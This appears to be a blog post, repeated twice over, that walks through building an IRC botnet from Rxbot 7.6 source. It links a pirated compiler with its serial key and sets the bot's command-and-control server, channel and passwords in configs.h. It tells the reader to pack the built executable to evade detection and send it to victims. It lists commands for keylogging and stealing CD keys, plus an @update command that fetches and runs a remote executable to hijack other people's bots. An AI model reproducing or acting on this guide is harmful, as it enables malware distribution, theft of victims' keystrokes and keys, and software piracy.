Now to build yourself a botnet :-
Setting up the C++ compilier
1. Download Microsoft Visual C++ 6.0 Standard Edition
http://depositfiles.com/files/81uqoh1tc
Pass: itzforblitz
Serial: 812-2224558
2. Run setup.exe & install. Remember to put the serial in
3. Download & install Service Pack 6
http://depositfiles.com/files/fd8nkdque
NOTE: Replace Mcft with Micro.soft
4. Download & install the Windows Platform SDK:
http://depositfiles.com/files/s7lzohd86
Pass: itzforblitz
II. Configuring the C++ compilier
1. Open up Microsoft Visual C++ Compilier 6.0
2. Go to Tools > Options and Click the "Directories" tab
3. Now, browse to these directories and add them to the list: (Click the dotted box to add)
Quote:
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\BIN
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\INCLUDE
C:\PROGRAM FILES\MICROSOFRT PLATFORM SDK\LIB
4. Now put them in that order: use the up & down keys
it doesn`t matter whats below those lines
Configuring the C++ compilier
1. Open up Microsoft Visual C++ Compilier 6.0
2. Go to Tools > Options and Click the "Directories" tab
3. Now, browse to these directories and add them to the list: (Click the dotted box to add)
Quote:
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\BIN
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\INCLUDE
C:\PROGRAM FILES\MICROSOFRT PLATFORM SDK\LIB
4. Now put them in this order: (use up and down arrows)
it doesn`t matter whats below these lines
---------------------------------------
Configuring your bot:_
1. Download and unpack: This botsource:
http://depositfiles.com/files/8dag1p2ua
2. You should see an Rxbot 7.6 folder
3. Open the Rxbot 7.6 > configs.h folder and edit these lines only:
Quote:
Put in quotations:
char password[] = "Bot_login_pass"; // bot password (Ex: monkey)
char server[] = "aenigma.gotd.org"; // server (Ex: irc.efnet.net)
char serverpass[] = ""; // server password (not usually needed)
char channel[] = "#botz_channel"; // channel that the bot should join
char chanpass[] = "My_channel_pass"; // channel password
Optional:
char server2[] = ""; // backup server
char channel2[] = ""; // backup channel
char chanpass2[] = ""; //Backup channel pass
Building your bot: -
1. Make sure Microsoft Visual C++ is open
2. Select "File > Open Workspace"
3. Browse to your Rxbot 7.6 folder & open the rBot.dsw file
4. Right Click "rBot Files" & click Build
5. rBot.exe will be in the Rxbot 7.6 > Debug folder !!!
Now get the bot & pack it Use the tool in third part to open the bot & click "Protect" & then send it .
Command list
http://depositfiles.com/files/gg3jungbi
Some Basics:
.login botpassword will login bots
.logout will logout bots
.keylog on will turn keylogger on
.getcdkeys will retrieve cdkeys.
Read command list for more
Download mIRC
http://depositfiles.com/files/d6ulf76ju
How to secure your bots
To steal bots, watch for the @login key you must upload their bot to a direct link (tdotnetwork is execellent)
update the channel topic and run:
Quote:
@update hxxp://mybot.com/download/SMSPRO.exe 82
To secure your self:
It is fairly easy to secure your bots, here is how:
1. When you are in your right click on your chat window and select "Channel Modes"
2. Make sure these options are checked:
secret and private also key (xxxx)
This way no one but you can set the channel topic.
make your key the same as your channel password.
Good IRC Servers:
irc.wotnet.com is bot friendly as long as the bots cant harm the server or the
other users.
Zerofusion (look in mIRC) is bot friendly.
*
this much used so i cant credit the author of the bot
Setting up the C++ compilier
1. Download Microsoft Visual C++ 6.0 Standard Edition
http://depositfiles.com/files/81uqoh1tc
Pass: itzforblitz
Serial: 812-2224558
2. Run setup.exe & install. Remember to put the serial in
3. Download & install Service Pack 6
http://depositfiles.com/files/fd8nkdque
NOTE: Replace Mcft with Micro.soft
4. Download & install the Windows Platform SDK:
http://depositfiles.com/files/s7lzohd86
Pass: itzforblitz
II. Configuring the C++ compilier
1. Open up Microsoft Visual C++ Compilier 6.0
2. Go to Tools > Options and Click the "Directories" tab
3. Now, browse to these directories and add them to the list: (Click the dotted box to add)
Quote:
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\BIN
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\INCLUDE
C:\PROGRAM FILES\MICROSOFRT PLATFORM SDK\LIB
4. Now put them in that order: use the up & down keys
it doesn`t matter whats below those lines
Configuring the C++ compilier
1. Open up Microsoft Visual C++ Compilier 6.0
2. Go to Tools > Options and Click the "Directories" tab
3. Now, browse to these directories and add them to the list: (Click the dotted box to add)
Quote:
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\BIN
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\INCLUDE
C:\PROGRAM FILES\MICROSOFRT PLATFORM SDK\LIB
4. Now put them in this order: (use up and down arrows)
it doesn`t matter whats below these lines
---------------------------------------
Configuring your bot:_
1. Download and unpack: This botsource:
http://depositfiles.com/files/8dag1p2ua
2. You should see an Rxbot 7.6 folder
3. Open the Rxbot 7.6 > configs.h folder and edit these lines only:
Quote:
Put in quotations:
char password[] = "Bot_login_pass"; // bot password (Ex: monkey)
char server[] = "aenigma.gotd.org"; // server (Ex: irc.efnet.net)
char serverpass[] = ""; // server password (not usually needed)
char channel[] = "#botz_channel"; // channel that the bot should join
char chanpass[] = "My_channel_pass"; // channel password
Optional:
char server2[] = ""; // backup server
char channel2[] = ""; // backup channel
char chanpass2[] = ""; //Backup channel pass
Building your bot: -
1. Make sure Microsoft Visual C++ is open
2. Select "File > Open Workspace"
3. Browse to your Rxbot 7.6 folder & open the rBot.dsw file
4. Right Click "rBot Files" & click Build
5. rBot.exe will be in the Rxbot 7.6 > Debug folder !!!
Now get the bot & pack it Use the tool in third part to open the bot & click "Protect" & then send it .
Command list
http://depositfiles.com/files/gg3jungbi
Some Basics:
.login botpassword will login bots
.logout will logout bots
.keylog on will turn keylogger on
.getcdkeys will retrieve cdkeys.
Read command list for more
Download mIRC
http://depositfiles.com/files/d6ulf76ju
How to secure your bots
To steal bots, watch for the @login key you must upload their bot to a direct link (tdotnetwork is execellent)
update the channel topic and run:
Quote:
@update hxxp://mybot.com/download/SMSPRO.exe 82
To secure your self:
It is fairly easy to secure your bots, here is how:
1. When you are in your right click on your chat window and select "Channel Modes"
2. Make sure these options are checked:
secret and private also key (xxxx)
This way no one but you can set the channel topic.
make your key the same as your channel password.
Good IRC Servers:
irc.wotnet.com is bot friendly as long as the bots cant harm the server or the
other users.
Zerofusion (look in mIRC) is bot friendly.
*
this much used so i cant credit the author of the bot
Labels:
How to creat a Botnet
0 comments:
Post a Comment